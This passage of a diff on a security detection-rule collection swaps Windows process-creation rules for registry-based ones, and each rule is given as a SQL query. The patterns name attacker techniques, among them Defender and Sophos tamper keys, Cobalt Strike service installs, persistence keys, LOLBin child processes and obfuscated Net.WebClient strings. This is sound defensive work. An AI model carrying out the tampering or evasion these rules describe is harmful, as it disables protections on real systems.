vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", - "author": "Florian Roth (Nextron Systems)", + "title": "CobaltStrike Service Installations in Registry", + "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", + "status": "test", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "author": "Wojciech Lesicki", "tags": [ + 
"attack.execution", "attack.privilege_escalation", - "attack.t1068" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((NewValue LIKE '%ADMIN$%' ESCAPE '\\' AND NewValue LIKE '%.exe%' ESCAPE '\\') OR (NewValue LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND NewValue LIKE '%start%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_41379.yml" + "filename": "registry_set_cobaltstrike_service_installs.yml" }, { - "title": "Wscript Shell Run In CommandLine", - "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "title": "Tamper With Sophos AV Registry Keys", + "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", "status": "experimental", - "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "description": "Detects tamper attempts to sophos av functionality via registry key modification", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Rare legitimate inline scripting by some administrators" + "Some FP may occur when the feature is 
disabled by the AV itself, you should always investigate if the action was legitimate" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_script_wscript_shell_cli.yml" + "filename": "registry_set_sophos_av_tamper.yml" }, { - "title": "PrintBrm ZIP Creation of Extraction", - "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "title": "Potential Persistence Via AutodialDLL", + "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "status": "experimental", - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. 
PrintBrm.exe should not be run on a normal workstation.", - "author": "frack113", + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_printbrm.yml" + "filename": "registry_set_persistence_autodial_dll.yml" }, { - "title": "HackTool - Potential Impacket Lateral Movement Activity", - "id": "10c14723-61c7-4c75-92ca-9af245723ad2", - "status": "stable", - "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "title": "Disable Windows Defender Functionalities Via Registry Keys", + "id": "0eb46774-f1ab-4a74-8238-1155855f2263", + "status": "experimental", + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" + "filename": "registry_set_windows_defender_tamper.yml" }, { - "title": "Suspicious WMIC Execution Via Office Process", - "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "title": "Potential Attachment Manager Settings Associations Tamper", + "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", "status": "experimental", - "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", - "author": "Vadim Khrykov, Cyb3rEng", + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND 
(CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND NewValue = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (NewValue LIKE '%.zip;%' ESCAPE '\\' OR NewValue LIKE '%.rar;%' ESCAPE '\\' OR NewValue LIKE '%.exe;%' ESCAPE '\\' OR NewValue LIKE '%.bat;%' ESCAPE '\\' OR NewValue LIKE '%.com;%' ESCAPE '\\' OR NewValue LIKE '%.cmd;%' ESCAPE '\\' OR NewValue LIKE '%.reg;%' ESCAPE '\\' OR NewValue LIKE '%.msi;%' ESCAPE '\\' OR NewValue LIKE '%.htm;%' ESCAPE '\\' OR NewValue LIKE '%.html;%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" + "filename": "registry_set_policies_associations_tamper.yml" }, { - "title": "File Download Using Notepad++ GUP Utility", - "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "title": "Custom File Open Handler Executes PowerShell", + "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the abuse of custom file open handler, executing powershell", + "author": "CD_R0M_", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Other parent processes 
other than notepad++ using GUP that are not currently identified" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\' AND NewValue LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_gup_download.yml" + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" }, { - "title": "Wab Execution From Non Default Location", - "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "title": "Registry Persitence via Service in Safe Mode", + "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", "status": "experimental", - "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.execution" + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR NewProcessName LIKE 
'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND NewValue = 'Service') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" + "filename": "registry_set_add_load_service_in_safe_mode.yml" }, { - "title": "Mavinject Inject DLL Into Running Process", - "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "title": "Disable Macro Runtime Scan Scope", + "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", "status": "experimental", - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentProcessName LIKE 
'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" + "filename": "registry_set_disable_macroruntimescanscope.yml" }, { - "title": "Suspicious Microsoft OneNote Child Process", - "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "title": "Windows Defender Service Disabled", + "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", "status": "experimental", - "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "File located in the AppData folder with trusted signature" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 
'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND NewValue = 'DWORD (0x00000004)')" ], - "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" + "filename": 
"registry_set_disable_windows_defender_service.yml" }, { - "title": "Net WebClient Casing Anomalies", - "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", - "status": "experimental", - "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", + "title": "Suspicious Printer Driver Empty Manufacturer", + "id": "e0813366-0407-449a-9869-a2db1119dc41", + "status": "test", + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Unknown" + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR 
CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE 
